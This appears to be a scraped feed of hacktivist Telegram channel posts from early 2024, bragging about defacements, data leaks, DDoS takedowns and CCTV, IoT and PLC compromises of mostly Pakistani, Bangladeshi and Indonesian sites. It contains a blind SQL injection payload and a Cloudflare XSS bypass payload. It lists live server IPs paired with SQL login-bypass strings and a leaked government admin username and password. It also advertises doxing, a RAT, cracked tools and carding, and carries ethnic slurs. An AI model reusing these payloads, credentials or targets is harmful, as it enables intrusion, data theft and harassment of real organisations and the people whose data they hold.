🟢 HACKTHEBOX ( HTB ) PREMIUM AVAILABLE ( PAID ) 🟢 DOXING SERVICE AVAILABLE ( PAID )DM @CYBERDIN IF YOU NEED✅ TRUSTED 🌐100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠 🔠🔤🔠🔠
2024-02-11 03:17:46
None
2024-02-11 02:43:31
None
2024-02-10 12:06:00
None
2024-02-10 07:12:04
🟢 TRYHACKME PREMIUM AVAILABLE ( PAID ) 🟢 YOUTUBE AND AMAZON PRIME PREMIUM AVAILABLE ( PAID ) DM @CYBERDIN IF YOU NEED✅️ TRUSTED🌐 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠   🔠🔤🔠🔠
2024-02-10 05:26:02
Truth , kids in class 10 who keep reposting random things on LinkedInDont worry, often these dont convert to anything more than followersMore at @EthicalHackX Images
2024-02-10 02:43:31
None
2024-02-09 14:09:19
Team Chutiya pk Exposed 💩🇵🇰1. ISRO doesn't use cpanel hosting 🤣 [https://www.isro.gov.in:2083/] 🙊2. ISRO doesn't make Brahmos 🚀 😂3. Main Server pe Brahmos ka docs store nhi hota 🫢4. Chutiya ki tarah yesterday all file update nhi karta (Last Modification: Yesterday) 😂😂💦Point to be highlighted *bad thing is we got access only for few minutes 🤣🤣🤣💦🫏🇵🇰Chutiyo Ne Login1.php Bhi Nahi HatayaUske Liye Bhi Dimag Chahiye Jo Tumne Cpanel Par Domain Dir. Add karke Kiya 💋LoL Hacker Bano Chutiya Nahi
2024-02-09 10:38:57
✅ Permanent Share of Cyber Demons India is live ⏺🥷 Join CDI Coding Resources Channel Now ࿗➡️ A one and only Stop for latest Cybersecurity and Coding Content⚡️➗➗➗➗➗➗➗➗➗➗➗➗🪖   ࿗ CDI Cyber Security Channel ࿗           👾    Join Now    👾🟣🟣🟣🟣⚡️🟣🌟🟣⚡️🟣🟣🟣🟣🪖   ࿗ CDI's Handwritten Notes Channel ࿗            🤩    Join Now    🤩➗➗➗➗➗➗➗➗➗➗➗➗🐻 Waiting area : @CYBERDIN1 🐻 Images
2024-02-09 06:25:53
Sytem32.ink For Sell✔️Domain Already Renewed For 3 Years (2026)✅Adsense Approved 💰Price: $180 (Negotiable)DM: @mynk0x00
2024-02-08 02:24:40
None
2024-02-08 01:02:56
https://ispr.gov.bd/en/home/FULL DEFACE DONE ✅💪JAI SHREE RAM 👑♥️❣️#UNKNOWN_CYBER_CULT⚜♤ @UCC_TEAM ♤⚜ Images
2024-02-07 08:04:31
🟢 TRYHACKME PREMIUM AVAILABLE ( PAID ) 🟢 YOUTUBE AND AMAZON PRIME PREMIUM AVAILABLE ( PAID ) DM @CYBERDIN IF YOU NEED✅️ TRUSTED🌐 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠   🔠🔤🔠🔠
2024-02-07 06:40:18
𝗕𝘂𝗹𝗸 𝗗𝗼𝗺𝗮𝗶𝗻 𝗦𝗰𝗮𝗻 𝘄𝗶𝘁𝗵 𝗚𝗔𝗨😱𝗟𝗶𝗻𝗸:https://twitter.com/thecybertix/status/1755118515470905497?t=oCymkflQaXCF4TMX_Z05FA&s=19
2024-02-07 05:37:07
Whenever you test Login or Registration Feature. Apply this SQL Payload in the Email Parameter👇🏻𝗣𝗮𝘆𝗹𝗼𝗮𝗱: ';WAITFOR DELAY '0:0:5'--𝗡𝗼𝘁𝗲: You have to intercept the Login/Registration Request and then Enter the Given Payload. If there is No Validation then it will be a Blind SQL Injection😎🔥
2024-02-06 13:00:24
None
2024-02-06 06:29:09
🟢 TRYHACKME PREMIUM AVAILABLE ( PAID ) 🟢 YOUTUBE AND AMAZON PRIME PREMIUM AVAILABLE ( PAID ) DM @CYBERDIN IF YOU NEED✅️ TRUSTED🌐 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠   🔠🔤🔠🔠
2024-02-06 04:20:22
Hey Guys I have developed a new python based port scanner tool which is platform independent and accuracy with concurrency, easy tool management, user friendly etc.. you can visit here for more https://github.com/sanjai-AK47/Khonshu
2024-02-05 12:23:24
New blog in OSINT Ambition OSINT: Revealing the digital identity of an invitation link creator on telegram by @ManuelBot59https://publication.osintambition.org/osint-revealing-the-digital-identity-of-an-invitation-link-creator-on-telegram-de88b747c046Join @osintambition for more.#osint #socmint #telegramosint #infosec #cybersec #privacy #security #opsec
2024-02-05 10:42:45
Any tryhackme supplier here ? Only dm me if one year and three months available , dm @cyberdin
2024-02-05 06:45:52
📟Xavier Marks Indonesian Data Leak : Download👾CVE-2023-34039 Exploit : Download🐲Craxs Rat V6.7 : Download🕸Invicti Standard V23.9.0.42095 Crack : Download🪅Telegram Bot For Remote Access To Computer Files : Download📯Get IP Address On Other Side Audio Call In Telegram : Download
2024-02-05 05:20:51
Pakistan is beizzati magnet everywhere
2024-02-05 04:47:54
🟢 TRYHACKME PREMIUM AVAILABLE ( PAID ) 🟢 YOUTUBE AND AMAZON PRIME PREMIUM AVAILABLE ( PAID ) DM @CYBERDIN IF YOU NEED✅️ TRUSTED🌐 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠   🔠🔤🔠🔠
2024-02-05 01:48:24
None
2024-02-05 01:38:18
None
2024-02-04 23:32:02
HACKED BY TEAM NETWORK-NINEsite: https://techclick24.com/poc: https://web.archive.org/web/20240204113947/https://techclick24.com/Threat Actor : ghost and solveigGreetz to : #Demonsec#Team D4RK PREDAT0RZ#ʀᴀsʜᴛʀɪʏᴀ ᴄʏʙᴇʀ ғᴏʀᴄᴇ#Team ucc#Team BlackDragonsec#Team NWH Security#Kerala Cyber Xtractors#indiancybermafia#anonsec#Dark cyber warrior Images
2024-02-04 13:28:22
JOIN THE ULTIMATE DATABASEHACKING CLASS @hackingvidhya BY @Rajput_Haxor Images
2024-02-04 08:17:16
🔖Remote Code Execution ⚠️It's for whom who wanna Learn Specially RCE Vulnerability, It's a Comprehensive Guidance pdf of Remote Code Execution for Beginner to Advanced...
2024-02-04 06:46:31
🟢 TRYHACKME PREMIUM AVAILABLE ( PAID ) 🟢 YOUTUBE AND AMAZON PRIME PREMIUM AVAILABLE ( PAID ) DM @CYBERDIN IF YOU NEED✅️ TRUSTED🌐 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠   🔠🔤🔠🔠
2024-02-04 01:42:36
guys how to create free business email video is out now? go watch and subscribe my channel and give genuine feedback in comments.https://youtu.be/X4gCmcyYiEM?si=PLfN8uQm1zW3K2zv
2024-02-03 14:30:57
None Images
2024-02-03 13:14:16
🟢 TRYHACKME PREMIUM AVAILABLE ( PAID ) 🟢 YOUTUBE AND AMAZON PRIME PREMIUM AVAILABLE ( PAID ) DM @CYBERDIN IF YOU NEED✅️ TRUSTED🌐 100% MONEY BACK GUARANTEE CHECK @PROOFSCDI FOR PROOFS🔠🔠   🔠🔤🔠🔠
2024-02-03 10:56:27
None
2024-02-03 02:12:05
🖼️ Bypass Medium PaywallA little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free:🔗 https://freedium.cfd/<URL>🔗 https://medium-forall.vercel.app/#medium #premium #bypass
2024-02-02 13:42:17
#offtopic Hey guys, I need to complete visitors count of 1000 on the following links. These are official website of Microsoft, so nothing to worry about. Please help me by opening both the links in your phone once. https://azure.microsoft.com/?wt.mc_id=studentamb_251941https://devblogs.microsoft.com/?wt.mc_id=studentamb_251941Thanks for your help. We will be active again from Monday.
2024-02-02 08:17:32
None
2024-02-02 08:03:07
None
2024-02-02 02:51:36
𝗘𝘅𝗽𝗹𝗼𝗶𝘁𝗶𝗻𝗴 𝗨𝗻𝗸𝗻𝗼𝘄𝗻 𝗖𝗩𝗘'𝘀Tool Link given in DescriptionPlease Like & Subscribe to our YouTube Channel. 𝗟𝗶𝗻𝗸: https://youtu.be/Z-OBQWbqIoM?si=eph9sSISKRGy2XGk
2024-02-02 02:45:56
SOME BEST SITES TO STREAMNETFLIX, DISNEY ETC. MOVIES ONLINE 1. https://hdtoday.cc2. https://afdah.space3. https://soap2day.tf/home4. https://anymovie.ccContact for posting these content in your channel🎭Share with your Mate Images
2024-02-02 02:45:55
UNLIMITED WHATSAPP NUMBER AND TELEGRAM TRICK 💫1. Connect any valid vpn to usa server (recommended express)2. Go to Play Store3. Download Talkatone app4. Create a new gmail account and signup with new gmail account in talkatone5. Now choose country area code 570Boom 💥 you got a number working in telegram and WhatsApp also 👍🔣🔣 Share with your Mate 🔣🔣
2024-02-02 00:44:27
pakistani stock exchange automation system has been HACKED BY TEAM-NETWORK-NINEThreat actor P10NE#ʀᴀsʜᴛʀɪʏᴀ ᴄʏʙᴇʀ ғᴏʀᴄᴇ#Team404Error#Blionrie404 #TeamNwh#Network_Nine #TEAM_ICP#UnknownCyberCult #GarunaOps#Indian_Cyber_Punk #UrDdos#UCC_TEAM #GlorySec#DarkCyberWarrior #DemonSec#SilentOne #AnonSec#Black_Dragon_Sec Images Images Images
2024-02-01 07:26:09
bypass XSS Cloudflare WAFEncoded Payload &#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;Clean Payload "><track/onerror='confirm`1`'>#CF #bypass
2024-01-31 22:00:22
https://youtu.be/uvi-1I--zjs?si=gdLM0LW93UMaqhEcLIKE SHARE SUBSCRIBE ❤️ Images
2024-01-31 09:49:29
Join This Channel For Hacking Stuffs: @reverse_engineers+ Courses
2024-01-31 05:10:15
None
2024-01-30 07:33:51
None
2024-01-30 07:24:27
None
2024-01-29 14:49:49
Cyber security RoadmapShared by @cybertrickzone Images
2024-01-29 05:09:58
None
2024-01-29 00:14:26
⚠️ PAKISTAN NEWS CHANNELS SCRIPT SERVER ACCESS LEAKED BY TEAM UCC ⚠️1. 7 NEWS ( 290K subscribers Channel Of Pakistan )IP :- http://116.58.87.14/main.phpCredentials :- ' or 1=1 limit 1-- -+2. 24 News Hd ( 7.49M subscribers Channel Of Pakistan )IP :- http://125.209.112.14:24/index.phpCredentials :- ' or 1=1 limit 1-- -+24 NEWS HD CONNECTED WITH CITY 21 NEWS !!3. City 21 News ( 223K subscribers Channel Of Pakistan )IP :- http://125.209.112.14:2121/Credentials :- ' or 1=1 limit 1-- -+4. Avt Channels ( Network )IP :- http://115.186.58.98/newsy/Credentials :- ' or 1=1 limit 1-- -+#Happy_Republic_Day#WeAreIndiansHackers⚜️♤ @UCC_TEAM ♤⚜️ Images Images Images
2024-01-28 04:21:40
None
2024-01-28 03:52:39
None
2024-01-27 16:23:32
https://youtu.be/zklViYoZNmc?si=wTbISMMqBDc9t5aY
2024-01-27 14:25:54
https://suparco.gov.pk Images
2024-01-27 04:59:03
None
2024-01-27 00:21:13
Pakistani 250+ cctv has been hacked by 404 ERROR OFFICIAL ⚡ include factory, office,home etc.#Team404Error#Blionrie404 #TeamNwh#Network_Nine #TEAM_ICP#UnknownCyberCult #GarunaOps#Indian_Cyber_Punk #UrDdos#UCC_TEAM #GlorySec#DarkCyberWarrior #DemonSec#SilentOne #AnonSec#Black_Dragon_Sec    ⚡@Team404Error⚡ Images Images Images Images Images Images Images Images Images Images
2024-01-27 00:21:12
gourmetfoods.pk HAS been Hacked by TEAM-NETWORK-NINE☠️Site :https://gourmetfoods.pk/☠️Poc :https://web.archive.org/web/20240126172337/https://gourmetfoods.pk/☠️Threat actor SOLVEIG AND Odiyan☠️ALL Data has been DeletedGreetings toUNITED INDIAN HACKERS #india cyber force #Glorysec#TEAM-NETWORK-NINE#AnonSec#TeamUcc#Team_DarkCyberWarrior#Team_NWH_Security#lulzsec India#Team Blakdragonsec #PKMB Images Images
2024-01-26 16:47:19
Government of Khyber Pakhtunkhwa data leaked by 404 ERROR OFFICIAL⚡Target 🎯 :- https://kp.gov.pk/Sample 5k+ Compromised data :- name, father name,cnic number, contact number, address, issued date#Team404Error#Blionrie404 #TeamNwh#Network_Nine #TEAM_ICP#UnknownCyberCult #GarunaOps#Indian_Cyber_Punk #UrDdos#UCC_TEAM #GlorySec#DarkCyberWarrior #DemonSec#SilentOne #AnonSec#Black_Dragon_Sec ⚡@Team404Error⚡ Images
2024-01-26 16:41:15
🔥Education Based Website Of Pakistan Website Hacked By Team UCC 🔥✅🇵🇰 SITE :- https://dpi.edu.pk/✅🇵🇰 POC :- https://ownzyou.com/zone/201042#Happy_Republic_Day#WeAreIndiansHackers#AnonymousIndia #UnknownCyberCult #Indian_Cyber_Punk #TeamNwh #All_Indian_Hackers #Network_Nine #Black_Dragon_Sec #DarkCyberWarrior #Demon_Sec #GlorySec⚜️♤ @UCC_TEAM ♤⚜️ Images
2024-01-26 16:37:04
Modbus/plc of Pakistan has been hacked by TEAM-NETWORK-NINE☠️Threat actor GhostGreetings toUNITED INDIAN HACKERS #india cyber force #Glorysec#TEAM-NETWORK-NINE#AnonSec#TeamUcc#Team_DarkCyberWarrior#Team_NWH_Security#lulzsec India#Team Blakdragonsec Images Images Images
2024-01-26 16:35:05
Jazz pay accepted
2024-01-26 16:19:13
None
2024-01-26 16:16:52
Indonesia Ministry of Foreign affairshttps://check-host.net/check-report/14f85797kcdehttps://kemlu.go.id/portal/en⩩ ˜”°•✩•°”˜ 𝙰𝚗𝚘𝚗_ ˜”°•✩•°”˜ ⩩ 𝙰𝙻𝙻 𝙼𝙴𝙼𝙱𝙴𝚁𝚂 𝙾𝙵 𝙽𝚆𝙷 𝚂𝙴𝙲𝚄𝚁𝙸𝚃𝚈⩩ 𝑻𝑬𝑨𝑴 𝑵𝑬𝑻𝑾𝑶𝑹𝑲 𝑵𝑰𝑵𝑬 ⩩ 𝐓𝐄𝐀𝐌 𝐔𝐂𝐂⩩ 𝙺𝙴𝚁𝙰𝙻𝙰 𝙲𝚈𝙱𝙴𝚁 𝚇𝚃𝚁𝙰𝙲𝚃𝙾𝚁𝚂⩩ 𝐃𝐀𝐑𝐊 𝐂𝐘𝐁𝐄𝐑 𝐖𝐀𝐑𝐑𝐈𝐎𝐑𝐒 ⩩ 𝕋𝔼𝔸𝕄 𝔹𝕃𝔸ℂ𝕂𝔻ℝ𝔸𝔾𝕆ℕ 𝕊𝔼ℂ⩩ 𝐈𝐍𝐃𝐈𝐀𝐍 𝐂𝐘𝐁𝐄𝐑 𝐅𝐎𝐑𝐂𝐄⩩ 𝙱𝙷𝙰𝚁𝙰𝚃𝙸𝚈𝙰 𝙲𝚈𝙱𝙴𝚁 𝙵𝙾𝚁𝙲𝙴⩩ 𝙰𝙽𝙾𝙽𝚈𝙼𝙾𝚄𝚂 𝙸𝙽𝙳𝙸𝙰⩩ 𝙰𝙽𝙾𝙽𝚈𝙼𝙾𝚄𝚂 𝙸𝚂𝚁𝙰𝙴𝙻⩩ 𝙽𝙳𝚃 𝚂𝙴𝙲 Images
2024-01-26 16:15:33
1200+ pakistani Iot devices has been hacked by 404 ERROR OFFICIAL⚡All credentials replaced to jaishreeram 🇮🇳#Team404Error#Blionrie404 #TeamNwh#Network_Nine #TEAM_ICP#UnknownCyberCult #GarunaOps#Indian_Cyber_Punk #UrDdos#UCC_TEAM #GlorySec#DarkCyberWarrior #DemonSec#SilentOne #AnonSec#Black_Dragon_Sec    ⚡@Team404Error⚡ Images Images Images Images Images Images Images Images Images Images
2024-01-26 16:13:05
Pakistani food delivery website data leaked by 404 ERROR OFFICIAL⚡Target 🎯 :- https://oregano.pk/Sample 2.4k+Compromised data :- userid name, contact number, address#Team404Error#Blionrie404 #TeamNwh#Network_Nine #TEAM_ICP#UnknownCyberCult #GarunaOps#Indian_Cyber_Punk #UrDdos#UCC_TEAM #GlorySec#DarkCyberWarrior #DemonSec#SilentOne #AnonSec#Black_Dragon_Sec    ⚡@Team404Error⚡ Images Images
2024-01-26 15:10:09
R. P. Saha University of Bangladesh data dump by 404 ERROR OFFICIAL⚡Target 🎯 :- https://rpsu.ac.bd/#Team404Error#Blionrie404 #TeamNwh#Network_Nine #TEAM_ICP#UnknownCyberCult #GarunaOps#Indian_Cyber_Punk #UrDdos#UCC_TEAM #GlorySec#DarkCyberWarrior #DemonSec#SilentOne #AnonSec#Black_Dragon_Sec    ⚡@Team404Error⚡ Images Images
2024-01-26 15:05:48
😈❤️‍🔥😈https://cltrcoop.punjab.gov.pk/abdalianchs_admin_lhr:P@kistan123 🔹🔹🔹✔️ @Hajit00n
2024-01-26 15:01:05
None
2024-01-26 14:34:51
GOVERNMENT OF BANLGADESH SERVER INTRUDED BY INDIAN HACKER GROUPSITE :- http://202.126.124.182:8080/files/1705837252_ind3x.htmlPROOF :- https://zone-xsec.com/mirror/id/642496"JAI HIND, JAI SHREE RAM"TEAM INDIAN HACKER GROUP Images
2024-01-26 14:33:58
LAHORE FURNITURE HACKED BY INDIAN HACKER GROUP SITE : https://lahorefurniture.pk/PROOF : https://zone-xsec.com/mirror/643089#OpPakistan #OpPak #OpBangladesh#JaiShreeRam #JaiHindFEEL THE POWER OF @INDIAN_HACKER_GROUP 🔥 Images
2024-01-26 14:31:56
Many Websites Taken Down By Team UCC x Error404 Teamhttps://thefinancialexpress.com.bd/https://www.hsia.gov.bd/https://www.bankalfalah.com/https://balochistan.gov.pk/https://balochistanpolice.gov.pk/https://www.navy.mil.bd/https://www.jakartaairportonline.comhttps://www.asf.gov.pk/https://eticket.railway.gov.bd/Threat Actor :- Error404✦ @ANONYMOUS_INDIA_101 ✦ Images
2024-01-26 14:18:31
ICT ADMINISTRATION [ BHIKARISTAN ] WEBSITE TAKEDOWN By Hacktivist Vanguard 👍😂Site 👾 : https://ictadministration.gov.pk/🧌> Server Down 👍 Get Some Good Hosting Bhikaristan Check Host : https://check-host.net/check-report/14efc5cek652#JaiHind 🇮🇳 Images Images
2024-01-26 14:07:41
Online Quran Teacher BD Has Been Hacked! Site:>> onlinequranteacher.netMirror:>> https://ownzyou.com/zone/201030Stay away from Indian Cyberspace! #IndianCyberForce
2024-01-26 14:07:26
😈 Balebengong News Website Indonesia Hacked😈 Site :- http://balebengong.id/https://www.aswajadewata.com/😈 Mirror :- https://ownzyou.com/zone/201034🚩Jai Hind, Jai Bharat, Jai Shree Ram#Team404Error#Blionrie404 #TeamNwh#Network_Nine #TEAM_ICP#UnknownCyberCult #GarunaOps#Indian_Cyber_Punk #UrDdos#UCC_TEAM #GlorySec#DarkCyberWarrior #DemonSec#SilentOne #AnonSec#Black_Dragon_Sec Images
2024-01-26 13:18:18
https://thebusiness.com.pk/epaper/index.php been Hacked by TEAM-NETWORK-NINE☠️Site :https://thebusiness.com.pk/epaper/index.php☠️Poc :https://ownzyou.com/zone/201023☠️Threat actor SOLVEIG and madghostGreetings toUNITED INDIAN HACKERS #india cyber force #Glorysec#TEAM-NETWORK-NINE#AnonSec#TeamUcc#Team_DarkCyberWarrior#Team_NWH_Security#lulzsec India#Team Blakdragonsec Images
2024-01-26 13:17:19
#IndianCyberForce Images Images
2024-01-26 07:39:40
Cyber alert 🚨for .pk .bd .idGet ready to feel the power of Indian hackers. Today we will burn your entire cyberspace to ashes💀😈 Payback for touching indian cyber space😡               #WeAreIndianHackers              #JaiShreeRam🇮🇳🇮🇳#Team404Error#Blionrie404 #TeamNwh#Network_Nine #TEAM_ICP#UnknownCyberCult #UrDdos#Indian_Cyber_Punk #GarunaOps#UCC_TEAM #GlorySec#DarkCyberWarrior #DemonSec#SilentOne #AnonSec#Black_Dragon_Sec
2024-01-26 05:38:07
✅ Permanent Share of Cyber Demons India is live ⏺🥷 Join CDI Coding Resources Channel Now ࿗➡️ A one and only Stop for latest Cybersecurity and Coding Content⚡️➗➗➗➗➗➗➗➗➗➗➗➗🪖   ࿗ CDI Cyber Security Channel ࿗           👾    Join Now    👾🟣🟣🟣🟣⚡️🟣🌟🟣⚡️🟣🟣🟣🟣🪖   ࿗ CDI's Handwritten Notes Channel ࿗            🤩    Join Now    🤩➗➗➗➗➗➗➗➗➗➗➗➗🐻 Waiting area : @CYBERDIN1 🐻 Images
2024-01-26 05:04:25
On this occasion of India's Republic Day, let us all pledge to harness our individual strengths and ambitions to contribute to the nation's progress, ensuring that it continues to shine as a beacon of hope and prosperity, Happy Republic Day. 🇮🇳#IndianCyberForce Images
2024-01-25 18:30:51
सभी भारतीयों को गणतंत्र दिवस की शुभकामनाएं। जय हिन्द जय भारत 🇮🇳♥️🇮🇳 Images
2024-01-25 12:19:20
None
2024-01-25 03:20:40
None
2024-01-25 03:12:22
None
2024-01-23 02:45:58
None
2024-01-23 00:49:39
Jai shree Ram Images
2024-01-22 09:03:10
🇨🇦
2024-01-22 07:38:14
None Images
2024-01-22 06:56:16
"Looking forward to visit Ayodhya very soon. For today I visited the historic Shree Ram Mandir in Wadala, Mumbai."- Kobbi Shoshani, Israel's Ambassador to India. Images
2024-01-22 06:17:20
Golden gate San Francisco CA USA
2024-01-22 06:14:36
Eiffel tower...
2024-01-22 06:05:46
Indian diaspora illuminated Times Square, New York to celebrate the Pran Prathistha ceremony at Ram Mandir, Ayodhya. Images Images Images
2024-01-21 23:50:14
None Images
2024-01-21 23:40:17
CrackCodes 🇮🇳 pinned a photo
2024-01-21 23:34:57
None Images Images Images Images
2024-01-21 23:34:56
None Images Images Images Images
2024-01-21 18:30:20
रामाय रामभद्राय रामचंद्राय वेधसे ।रघुनाथाय नाथाय सीतायाः पतये नमः ॥ श्री राम मंदिर के प्राण प्रतिष्ठा की शुभकामनाएं!सभी अपने घरो में दिये जलायें और दीपावली मनायें🙏🙏♥️♥️ Images
2024-01-21 15:13:23
https://www.linkedin.com/posts/punitdarji_mastering-aws-elastic-beanstalk-unleashing-activity-7154468378445807617-ObsS?utm_source=share&utm_medium=member_android
2024-01-21 08:58:25
Any codecanyon.net Carder?
2024-01-21 08:39:53
Happy Birthday Ajit Doval Sir James Bond of India 🇮🇳 Images Images
2024-01-20 14:08:47
None
2024-01-20 03:40:00
New article in OSINT Ambition PublicationUnlock The Power Of Obsidian For OSINT And Blockchain Intelligence Analysishttps://publication.osintambition.org/unlock-the-power-of-obsidian-for-osint-and-blockchain-intelligence-analysis-a69e526e2638#osint #report #obsidian #blockchainintelligence
2024-01-19 22:50:44
https://www.instagram.com/p/C2Snh__y_96/Hacked By PkG
2024-01-19 09:36:24
https://t.me/+SdcKqIdSSJpmNDY1
2024-01-19 08:14:11
None
2024-01-19 07:56:57
None
2024-01-19 05:59:22
System32.ink For Sell Adsense Approved ✅Domain registered: 2026@mynk0x00 Images
2024-01-18 15:17:24
We Changed Our Twitter Url. All Cyber Attacks By Us Will Update On Our Official Twitter Account.Connected With Us On (Twitter)For More Updates !! 🤞 #TEAM_UCC #UNKNOWN_CYBER_CULTJai Hind Jai Bharat 🇮🇳 Jai Shree Ram 🚩⚜️♤ @UCC_TEAM ♤⚜️ Images
2024-01-18 14:09:32
Flutter Developer?
2024-01-18 12:57:13
Any good video editor who can do a little video editing stuff for us. If anyone is interested, drop a message in dm. We would love if anyone can do this in free, otherwise, we are ok in paying too as per the work.Just knowing how some editing software and their features is not enough, so you should have a good thinking ability + good editing skills. Drop a message to @dheerajydv19
2024-01-18 12:40:15
Any Dev. Know How To Solve This Flutter Error Images
2024-01-18 08:33:36
How to report if your account gets hacked/Impersonated? | Only for Indian CitizensFor Facebook - https://www.facebook.com/help/contact/278770247037228For Whatsapp -https://www.whatsapp.com/contact/forms/1534459096974129?lang=en_USFor Instagram -https://help.instagram.com/contact/779201836048501For Twitter/Xhttps://help.twitter.com/en/forms/report-to-grievance-officer-indiaIf no response, https://gac.gov.in/Join @osintambition for more.
2024-01-18 05:17:34
None
2024-01-17 15:29:23
https://www.instagram.com/reel/C15mdhqvBX-/?igsh=MTE0bG4yNGo1cXBucQ==He is helping everyone with DSA and different programming languages so if you are interested you can follow this profile or contact him for any queries.
2024-01-17 14:24:37
None
2024-01-17 12:05:52
Iran has struck camps of militant group Jaish-al-Adl located inside Pakistan with ballistic missiles and armed drones.Pakistan Air Force failed to intercept any of the attack drones despite scrambling multiple JF-17s from Samungli air base. Images
2024-01-17 11:30:49
[𝐅𝐑𝐄𝐄 𝐑𝐄𝐒𝐎𝐔𝐑𝐂𝐄𝐒 - 𝐑𝐄𝐃 𝐓𝐄𝐀𝐌]Pentesting is primarily concerned with identifying and exploiting vulnerabilities within a specific target system, striving to uncover as many weaknesses as possible. This process aids in shoring up an organization's defenses by pinpointing areas of vulnerability.On the other hand, a red team engagement shifts its focus. Instead of merely finding vulnerabilities, it aims to assess an organization's defensive capabilities by simulating real-world attacks. The goal is to evaluate how well the organization can detect and respond to these simulated threat actors.You will find below a list of resources for Red Teaming.👉𝗪𝗛𝗔𝗧 𝗜𝗦 𝗥𝗘𝗗 𝗧𝗘𝗔𝗠?🌟Red Team definition, redteam guide by Joe Vest & James Tubbervillehttps://lnkd.in/eUaZcWvg🌟Red Teaming Handbook, UK Ministry of Defensehttps://lnkd.in/euUkwQRq👉𝗪𝗛𝗔𝗧 𝗔𝗥𝗘 𝗥𝗘𝗗 𝗧𝗘𝗔𝗠 𝗘𝗫𝗘𝗥𝗖𝗜𝗦𝗘𝗦?🌟NIST’s Definition of Red Team Exercisehttps://lnkd.in/eZVzn5AW🌟Red Team Plan by Magoohttps://lnkd.in/eFUBzxEY🌟Anatomy of a red Exercise (3 chapters) by Cyberforce Offensive Security Teamhttps://lnkd.in/eWNXrVGxhttps://lnkd.in/esvyKQ4Zhttps://lnkd.in/ea-9Cxxr👉𝗧𝗘𝗖𝗛𝗡𝗜𝗤𝗨𝗘𝗦 𝗔𝗡𝗗 𝗠𝗘𝗧𝗛𝗢𝗗𝗢𝗟𝗢𝗚𝗜𝗘𝗦🌟MITRE ATT&CK Matrix for Enterprisehttps://attack.mitre.org/🌟Red Team Guides by Joe Vest & James Tubberville https://lnkd.in/eXPxchUk🌟Red Team Operations Part 1 and 2 Joas A Santoshttps://lnkd.in/e7m3XzE7https://lnkd.in/es7uSQA4🌟Red Team Notes 2.0 by dmcxbluehttps://lnkd.in/ekGaQASx👉𝗖𝗢𝗨𝗥𝗦𝗘𝗦 𝗔𝗡𝗗 𝗛𝗔𝗡𝗗𝗦 𝗢𝗡🌟Hackersploit Red Team Series (video and guide)https://lnkd.in/ek5naA4Qhttps://lnkd.in/e4U2tW2z🌟Responsible Red Teaming by The Taggart Institutehttps://lnkd.in/eur4_nFn🌟Red Teaming rooms on TryHackmehttps://lnkd.in/e8G9eMS5https://lnkd.in/eYa9mHmk https://lnkd.in/eQcnuu-m🌟Board games by Hadess | حادثhttps://lnkd.in/ee2EEyEh👉𝗧𝗢𝗢𝗟𝗦🌟Red Teaming Toolkit by infosecn1njahttps://lnkd.in/e8VnsYVH🌟Red Team tools by A-pochttps://lnkd.in/evPBDZRm🌟Red Teaming Toolkit Collection by 0xsphttps://lnkd.in/eP7jNUE4🌟Red Team Ops Cobalthttps://lnkd.in/euMjeFEx👉𝗕𝗢𝗡𝗨𝗦🌟Red Team Resources by J0hnBxhttps://lnkd.in/eeYCQ-Db🌟Red Team Village talkshttps://lnkd.in/eHwKj5gB🌟A Beginner's Guide to Obfuscation by BC Securityhttps://lnkd.in/e92JuwPR🚨 𝐒𝐇𝐀𝐑𝐄 - Do you know other resources? Please share them in the comment🚨Shared by : @cybertrickzone
2024-01-17 09:18:30
New Article in OSINT AmbitionUnveiling the Mystery: My Journey of Geolocating an Image Using AI Tools and Persistencehttps://publication.osintambition.org/unveiling-the-mystery-my-journey-of-geolocating-an-image-using-ai-tools-and-persistence-3f54c960add0 #osint #ai #geoint #geolocation #openstreetmap #overpassturbo
2024-01-17 06:32:08
𝗜𝗺𝗽𝗿𝗼𝗽𝗲𝗿 𝗔𝗰𝗰𝗲𝘀𝘀 𝗖𝗼𝗻𝘁𝗿𝗼𝗹 𝗶𝗻 𝗚𝗶𝘁𝗹𝗮𝗯 😎𝗕𝗼𝘂𝗻𝘁𝘆: 𝟯𝟬𝟬𝟬$𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖: https://youtu.be/PRwUK00Uhsk?si=ifCw2dnJhBD3QgOr
2024-01-17 02:43:15
None
2024-01-17 02:26:09
None
2024-01-16 15:22:08
None
2024-01-16 13:32:06
None
2024-01-16 05:59:30
How to report if your account gets hacked Impersonated | Working for Indian Citizens onlyNew video uploaded on yt.Like, share and subscribe to our channel.https://youtu.be/cLXiuXkTt9cJoin @osintambition for more.
2024-01-16 02:43:52
None
2024-01-16 00:46:00
Blue Horizon Maldives Travel Agency has Been Hacked! Site > https://blue-horizon.com.mv/Mirror > https://www.zone-h.org/mirror/id/41104586#IndianCyberForce
2024-01-15 18:30:15
None
2024-01-15 15:23:54
OSINT: How to solve image intelligence (IMINT) challenges from a webcam (CCTV) picture A walkthrough of a interesting geolocation challenge by @OsintManuelBot59https://publication.osintambition.org/osint-how-to-solve-image-intelligence-imint-challenges-from-a-webcam-cctv-picture-5ddebe9e1bce #osint #IMINT #geolocation #challenge #geoint #walkthrough
2024-01-15 14:30:36
None
2024-01-15 13:08:46
FINDING NEW CODING COURSES ?CHECK MY GROUP ONCE 👇👇https://t.me/+yuCUDx5sK942MTE1
2024-01-15 06:43:05
